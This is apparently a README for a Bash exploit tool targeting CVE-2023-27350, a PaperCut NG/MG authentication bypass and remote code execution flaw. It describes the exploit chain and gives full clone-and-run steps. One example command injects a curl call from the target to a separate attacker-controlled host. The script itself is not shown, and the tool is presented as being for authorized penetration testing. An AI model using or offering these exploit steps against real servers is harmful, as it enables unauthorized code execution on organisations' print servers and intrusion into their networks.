
PaperCut NG/MG Authentication Bypass and Remote Code Execution (RCE) Exploit Tool. A standalone Bash implementation of the PaperCut exploit chain, featuring optional proxy support, automated session elevation, and dynamic command injection via the print scripting engine. Designed for security auditing and authorized penetration testing.

A streamlined Bash exploit for CVE-2023-27350. This script automates authentication bypass, environment preparation, and command injection via the PaperCut printer scripting engine.


# Clone the repository
git clone https://github.com/dezso-dfield/CVE-2023-27350.git
# Enter the directory
cd CVE-2023-27350
# Make the script executable
chmod +x rce.sh
# Run the exploit (Example with Proxy)
./rce.sh -u http://10.129.238.16:9191 -x http://10.129.238.16:3128 -c "curl http://10.10.15.82:8000/rce"
-u : Target URL (e.g., http://10.129.x.x:9191)-c : Command to execute (wrapped in quotes)-x : (Optional) Proxy URL (e.g., http://10.129.x.x:3128)